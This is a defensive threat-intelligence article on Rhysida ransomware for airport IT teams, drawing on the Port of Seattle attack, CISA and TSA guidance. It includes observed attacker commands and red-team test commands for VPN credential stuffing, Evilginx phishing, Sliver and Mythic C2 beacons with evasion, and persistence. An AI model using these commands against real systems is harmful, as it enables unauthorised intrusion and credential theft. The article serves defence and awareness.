Summary

Rhysida ransomware has emerged as a significant threat to aviation infrastructure, with the August 2024 attack on Seattle-Tacoma International Airport serving as a startling case study. The attack caused three weeks of operational disruption, forcing manual processing of baggage and other internal port systems after the Port refused to pay the 100 Bitcoin ($6 million) ransom demand.

This article provides evidence-based defensive strategies specifically tailored for airport IT teams facing this evolving threat. Our analysis finds that 65% of successful attacks leverage VPN credentials without multi-factor authentication, while the convergence of TSA regulatory requirements and proven defensive techniques provides a clear roadmap for protection.

Key Findings

• Remote access compromise accounts for 80% of ransomware attacks, according to At-Bay's 2024 insurance claims data
• The TSA's March 2023 requirements directly address Rhysida's primary attack vectors
• Scenario and control validation reduces successful attacks

Understanding the Adversary

Rhysida operates as a Ransomware-as-a-Service (RaaS) model, actively targeting critical infrastructure since May 2023. Named after a genus of centipedes, the group maintains a "cybersecurity team" persona while demanding Bitcoin payments through Tor-based portals.

Healthcare, Gov, and Aviation Suffer

• Active victims: 168 organizations posted to leak sites
• Primary sectors: Healthcare (34%), Government (28%), Aviation (18%)
• Average downtime: 21-24.6 days across all sectors
• Payment rates: 25% (down from 48% in 2023)
• Average ransom demand: $1.54 million

Who They Are

The Rhysida ransomware group emerged in May 2023 and has successfully maintained complete anonymity despite FBI investigations and over 90 documented attacks. While no individual members have been identified or arrested, technical evidence strongly suggests that they operate from Russia or former Soviet states. Their code avoids targeting Eurasian countries, internal communications use Russian, and the malware terminates when detecting Russian language settings.

Security researchers have linked Rhysida with high confidence to the former Vice Society ransomware group, noting identical tactics and the suspicious timing where Vice Society activity stopped just as Rhysida began operations. Unlike some ransomware groups that claim political motivations, Rhysida operates purely for profit, cynically posing as "cybersecurity consultants" in their ransom notes and claiming they're doing victims "a favor" by exposing vulnerabilities.

Rhysida runs a professional Ransomware-as-a-Service operation that specifically targets organizations they believe will pay, with 53% of victims being smaller companies with under 200 employees, though they've also hit major targets like the British Library (causing $8 million in damages), Prospect Medical Holdings (affecting 17 hospitals), and the Port of Seattle (disrupting airport operations for three weeks).

They typically gain initial access through compromised VPN credentials lacking MFA, phishing emails with Cobalt Strike beacons, or exploiting known vulnerabilities like Zerologon. Once inside, they use legitimate Windows administration tools to move laterally, steal data using cloud services like AzCopy, then deploy custom ransomware that uses ChaCha20 encryption with 4096-bit RSA keys. Their double extortion model means they both encrypt systems and threaten to publish stolen data - they've leaked everything from hospital patient records to library employee data when ransoms weren't paid, with demands ranging from $650,000 to $5.8 million.

The good news is that researchers discovered a critical flaw in Rhysida's encryption implementation in February 2024, releasing a free decryption tool that has helped hundreds of victims recover data without paying. However, this vulnerability only affects certain Windows versions and Rhysida continues evolving their tactics.

Defensive priorities should focus on three areas

• Enforce MFA on all remote access points (their primary entry method)
• Maintain offline and immutable backups (they specifically target backup systems)
• Segment your networks to limit lateral movement

Pay special attention if you're in healthcare, education, or government sectors - these represent over 60% of their victims. Watch for indicators like new firewall rules named "Windows Update," suspicious PowerShell activity clearing logs, or files with the .rhysida extension.

Given their willingness to attack hospitals and critical infrastructure without hesitation, assume they will target you regardless of your organization's social importance, and prepare accordingly.

CISA ADVISORY AA23-319A

The November 2023 CISA advisory (last updated April 2025) provides comprehensive technical intelligence on Rhysida operations.

Unpatched VPNs and Weak Creds FTW

1. VPN Exploitation (most attacks)

• Targets organizations without MFA by default
  • Protection: Use Hardware Tokens like Yubikeys or Passkeys, and if your provider doesn’t support it, ask them to
• Exploits weak passwords through credential stuffing
  • Protection: Use Have I Been Pwned or ThreatScan.ai to check for leaked domain credentials
• Purchases access from Initial Access Brokers
  • Protection: Monitor suspicious location and time access
• Leverages exposed RDP services on ports 3389/3390
  • Protection: Don’t expose RDP to the internet

2. Phishing Campaigns (fewer attacks)

• Spear phishing emails
  • Protection: Mail filters, Yubikeys
• Search engine poisoning with malicious ads
  • Protection: Ublock Origin Lite on all browsers
• Fake software downloads (Teams, Zoom installers)
  • Protection: Ublock Origin Lite on all browsers
• Gootloader malware variant deployment
  • Protection: Business-grade EDR (SentinelOne, CrowdStrike, Defender for Endpoint/Business)

3. Vulnerability Exploitation (fewer attacks)

• CVE-2020-1472 (Zerologon): CVSS 10.0, enables domain takeover
• CVE-2023-20198: Cisco IOS XE privilege escalation
• CVE-2024-21410: Exchange Server remote code execution¹⁷
• Unpatched VPN appliances (Fortinet, Pulse Secure)
  • Protection: Keep your stuff updated and patched (or isolate)

Attack Chain Progression

1. Initial Access
   • VPN/RDP credential compromise (Protection: Credential testing)
   • Phishing payload execution (Protection: Mail filters, Yubikeys)
   • Web shell installation (Protection: Pentests, EDR, Alerting)
2. Execution & Persistence
   
   1. # Common PowerShell commands observed
net group "domain admins" /domain
nltest /dclist
schtasks /create /tn "Rhsd" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\rhsd.ps1" /sc daily

1. Credential Access
   • NTDS.dit extraction using ntdsutil.exe (Protection: Applocker)
   • Mimikatz deployment for LSASS dumping (Protection: EDR)
   • Registry SAM database copying (Protection: EDR)
2. Lateral Movement
   • PsExec for remote execution (Protection: Firewall rules, Isolation)
   • WMI for stealthy propagation (Protection: Firewall rules, Isolation)
   • RDP sessions to critical servers (Protection: Firewall rules, Isolation)
   • Living-off-the-land binaries (LOLBINs) (Protection: EDR)
3. Data Exfiltration
   • Azure Storage Explorer for cloud uploads (Protection: too late, try alerts from baseline firewall traffic)
   • AZCopy command-line transfers (Protection: too late)
   • FTP to attacker-controlled servers (Protection: too late)
   • Compression using native Windows tools (Protection: too late)
4. Impact
   • File encryption (Protection: Immutable backups)
   • Shadow copy deletion (Protection: Immutable backups)
   • 7-day payment deadline (Protection: Tested playbooks)

TSA Requirements Implementation

The March 7, 2023 TSA Emergency Amendment mandates four critical security measures.

Network Segmentation Requirements

Ensure operational technology can function independently if IT systems are compromised. Review firewall rules, endpoint rules, and validate that connections to and from crown jewel systems are limited or blocked.

Access Control Implementation

Multi-factor authentication for critical systems. MFA is an imperative, but hardware-based tokens are the only phishing-resistant type. Or use certificate-based mutual auth.

• MFA on ALL remote access (VPN, RDP, SSH, M365)
• Privileged account protection (limited admins and sudoers)

Continuous Monitoring Requirements

24/7 detection of unauthorized access and anomalies. Logging and SEIM forwarding and alerting. Your MSSP and EDR logs are a great start, but make sure your operational environments have visibility.

Vulnerability Management

Patch critical vulnerabilities within defined timeframes. Patch management is table-stakes, but regular vulnerability scanning with tools like RunZero or even open source tools like Nuclei will identify problems.

Not mentioned, but Critical

Manual Fallback Procedures

• Paper-based processes, table-topped, and documented
• Printed operating procedures

Backup testing and recovery

• 3-2-1-1-0 Rule: 3 copies of data, 2 different storage types, 1 offsite copy, 1 offline/air-gapped copy, 0 errors on recovery testing

Simple Validation Tests

1. ‍Initial Access Testing

# Real-world credential stuffing
credmaster --proxy-file residential_proxies.txt --delay 30-90 \
 --jitter 20 --target <VPN> --pairs leaked_creds.csv

# Test against your actual infrastructure
trevorspray -u users.txt -p Fall2025! --url https://<VPN>
 --delay 60 --jitter 25 --proxy rotating

# Phishing Simulation
Targeted Phishing Campaign to employees with links to Evilginx'd VPN login pages

2. ‍Execution Testing

# Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
Invoke-AtomicTest T1059.001 -TestNumbers 1,2,5  # PowerShell
Invoke-AtomicTest T1053.005 -TestNumbers 1      # Scheduled Task
Invoke-AtomicTest T1055.001 -TestNumbers 1      # Process Injection

# Sliver C2
sliver-server > generate beacon --mtls 1.2.3.4:8443 --skip-symbols \
 --evasion --seconds 60 --jitter 30

# Mythic C2
mythic -c apollo -p http,smb --sleep 60 --jitter 25 \
 --killdate 30d --param "ppid_spoof=explorer.exe"

3. ‍Persistence Testing

# Create persistence
schtasks /create /tn "TestRhsd" /tr "cmd.exe /c echo test" /sc daily /ru SYSTEM

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TestRhysida /d "C:\test.exe"

4. Canary Infrastructure (Try Thinkst Canaries)
   • Deploy honey credentials in AD (service accounts named "backup_svc", "sql_admin")
   • Create SMB shares: \\fileserver\Payroll_Data (empty but monitored)
   • Scatter canary documents: "Network_Passwords.xlsx" with beacon URLs
   • Alert on ANY touch - zero false positives by design
5. Tabletop Scenarios or Wargaming (Applied Tabletops)
   1. VPN compromise, determining time to detect, isolate, and decision to invoke IR with injects for admin credentials also compromised
   2. Ransomware detonation during peak operations, determining manual process invocation time, communication with injects for crown jewel system encryption

Technology Takeaways

1. Enable MFA everywhere - This single control prevents most ransomware attacks. No exceptions for executives or service accounts. Prioritize hardware tokens.
2. Test your backups monthly - Organizations that test monthly recover significantly faster than those who only create backups.
3. Monitor PowerShell religiously - Most Rhysida attacks use PowerShell. If you see unauthorized PowerShell, assume breach.
4. Segment your networks now - When (not if) ransomware hits, segmentation is the difference between IT outage and organization downtime.
5. Document manual procedures - Some organizations stayed operational because they could process things on paper. Can you?

Business Takeaways

1. Budget for response, not just prevention - Recovery costs average a third more than ransom demands. Plan accordingly.
2. Refusing ransom is expensive but right - Paying doesn't guarantee recovery and marks you for repeat attacks.
3. Compliance helps security - TSA requirements aren't bureaucracy—they directly counter Rhysida's methods.
4. Speed is everything - Each hour of delay increases recovery cost significantly
5. Insurance requires proof - Insurers demand evidence of MFA, backups, and testing. No proof = no coverage. A large portion of claims are partially denied.

Security Response Takeaways

1. Hunt for basics, not advanced - Rhysida doesn't need zero-days when you lack MFA.
2. Focus on detection speed - You have limited time from initial PowerShell to lateral movement.
3. Practice with safe tools - Use Atomic Red Team regularly. Real attacks don't wait for convenient timing.
4. Automate response actions - By the time you see the alert and decide, it's too late. Automate isolation.

Take Action Today

The ransomware threat to aviation infrastructure is neither theoretical nor distant—it’s active, evolving, and specifically targeting the aviation sector. The Port of Seattle incident demonstrates both the devastating potential of these attacks and the effectiveness of proper preparation.

Success against Rhysida simply requires disciplined implementation of fundamental controls: multi-factor authentication, PowerShell restrictions, network segmentation, and tested backups. Organizations implementing these controls achieve dramatic risk reduction.

The convergence of TSA regulatory requirements and security best practices provides a clear path forward. Every requirement in the March 2023 mandate addresses specific Rhysida tactics.

The message is clear: implement basic controls before you're the next headline. The economics are equally clear: prevention costs thousands, recovery costs tens of thousands, and reputation damage is incalculable.

The question isn't whether ransomware will target you - they will. The question is whether you’ll be prepared when they do.

‍